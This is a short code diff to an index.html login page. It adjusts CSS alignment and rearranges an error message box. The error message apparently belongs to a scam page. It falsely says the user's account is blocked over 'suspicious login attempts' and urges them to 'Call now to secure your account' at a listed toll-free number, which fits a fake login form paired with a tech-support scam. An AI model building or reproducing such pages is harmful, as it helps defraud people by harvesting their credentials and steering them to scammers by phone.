--- a/index.html
+++ b/index.html
@@ -152,8 +152,8 @@
             width: 25px;
             height: 25px;
             display: flex;
-            justify-content: center;
-            align-items: center;
+            justify-content: left;
+            align-items: left;
             font-size: 16px;
             margin-right: 10px;
         }
@@ -208,8 +208,8 @@
 
         <!-- Error message box -->
         <div id="error-message-box" class="error-box" style="display: none;">
-           
-            <div class="error-text">You've entered an incorrect username or password. Please try again.   <div class="error-icon">!</div> Error code : 0X0047800 <br> your account has been blocked due to some suspicious login attempts <br> Call now to secure your account : <br> <a href="tel:18444991812">+1-844-499-1812</a></div>
+           <div class="error-icon">!</div>
+            <div class="error-text">You've entered an incorrect username or password. Please try again. <br> Error code : 0X0047800 <br> your account has been blocked due to some suspicious login attempts <br> Call now to secure your account : <br> <a href="tel:18444991812">+1-844-499-1812</a></div>
         </div>
 
         <form id="loginForm">
